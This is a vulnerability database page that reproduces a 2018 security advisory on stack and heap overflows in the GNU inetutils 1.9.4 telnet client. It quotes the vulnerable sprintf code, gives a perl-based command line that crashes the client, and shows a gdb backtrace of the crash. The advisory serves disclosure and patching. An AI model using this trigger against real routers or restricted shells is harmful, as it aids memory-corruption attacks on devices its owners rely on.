Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GNU inetutils 1.9.4 telnet.c Overflows

🗓️ 14 Dec 2018 00:00:00Reported by Hacker FantasticType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

GNU inetutils 1.9.4 telnet.c stack and heap overflow

Code
`GNU inetutils <= 1.9.4 telnet.c multiple overflows  
==================================================  
GNU inetutils is vulnerable to a stack overflow vulnerability in the  
client-side environment  
variable handling which can be exploited to escape restricted shells on  
embedded devices.  
Most modern browsers no longer support telnet:// handlers, but in instances  
where URI  
handlers are enabled to the inetutils telnet client this issue maybe  
remotely triggerable.  
A stack-based overflow is present in the handling of environment variables  
when connecting  
telnet.c to remote telnet servers through oversized DISPLAY arguments.  
  
A heap-overflow is also present which can be triggered in a different code  
path due to  
supplying oversized environment variables during client connection code.  
  
The stack-based overflow can be seen in the following code snippet from the  
latest inetutils  
release dated 2015.  
  
inetutils-telnet/inetutils-1.9.4/telnet/telnet.c  
  
983- case TELOPT_XDISPLOC:  
984- if (my_want_state_is_wont (TELOPT_XDISPLOC))  
985- return;  
986- if (SB_EOF ())  
987- return;  
988- if (SB_GET () == TELQUAL_SEND)  
989- {  
990- unsigned char temp[50], *dp;  
991- int len;  
992-  
993- if ((dp = env_getvalue ("DISPLAY")) == NULL)  
994- {  
995- /*  
996- * Something happened, we no longer have a DISPLAY  
997- * variable. So, turn off the option.  
998- */  
999- send_wont (TELOPT_XDISPLOC, 1);  
1000- break;  
1001- }  
1002: sprintf ((char *) temp, "%c%c%c%c%s%c%c", IAC, SB,  
TELOPT_XDISPLOC,  
1003- TELQUAL_IS, dp, IAC, SE);  
1004- len = strlen ((char *) temp + 4) + 4; /* temp[3] is 0 ... */  
1005-  
1006- if (len < NETROOM ())  
  
When a telnet server requests environment options the sprintf on line 1002  
will  
not perform bounds checking and causes an overflow of stack buffer temp[50]  
defined  
at line 990. This issue can be trivially fixed using a patch to add bounds  
checking  
to sprintf such as with a call to snprintf();  
  
An example of the heap overflow can be seen when handling large environment  
variables within the telnet client, causing heap buffer memory corruption  
through long string supplied in example USER or DISPLAY.  
  
An example of triggering this issue on inetutils in Arch Linux can be seen  
below:  
  
DISPLAY=`perl -e 'print Ax"50000"'` telnet -l`perl -e 'print "A"x5000'`  
192.168.69.1  
Trying 192.168.69.1...  
Connected to 192.168.69.1.  
Escape character is '^]'.  
realloc(): invalid next size  
Aborted (core dumped)  
  
These issues are present anywhere that inetutils is used as a base for  
clients  
such as in common embedded home routers or networking equipment. An attacker  
can potentially exploit these vulnerabilities to gain arbitrary code  
execution  
on platforms where telnet commands are available. An example debug trace of  
the  
heap overflow can be found below:  
  
(gdb) run -l`perl -e 'print "A"x5000'` 192.168.69.1  
Starting program: /usr/bin/telnet -l`perl -e 'print "A"x5000'` 192.168.69.1  
Trying 192.168.69.1...  
Connected to 192.168.69.1.  
Escape character is '^]'.  
realloc(): invalid next size  
  
Program received signal SIGABRT, Aborted.  
0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6  
(gdb) bt  
#0 0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6  
#1 0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6  
#2 0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6  
#3 0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6  
#4 0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6  
#5 0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6  
#6 0x000055555556029c in ?? ()  
#7 0x0000555555560116 in ?? ()  
#8 0x000055555556049f in ?? ()  
#9 0x00005555555606b7 in ?? ()  
#10 0x00005555555616de in ?? ()  
#11 0x0000555555561b8d in ?? ()  
#12 0x0000555555562122 in ?? ()  
#13 0x000055555555c6f4 in ?? ()  
#14 0x00005555555591e7 in ?? ()  
#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6  
#16 0x00005555555592be in ?? ()  
  
Due to the various devices embedding telnet from inetutils and distributions  
such as Arch Linux using inetutils telnet, it is unclear the full impact  
and all  
scenarios where this issue could be leveraged. An attacker may seek to  
exploit  
these vulnerabilities to escape restricted shells.  
  
-- Hacker Fantastic (11/12/2018)  
  
https://hacker.house  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Dec 2018 00:00Current
gnu inetutils1.9.4telnet.cstack overflowheap overflowenvironment variableremote triggerableembedded devicesstack bufferheap buffermemory corruptionarbitrary code executiontelnet command
43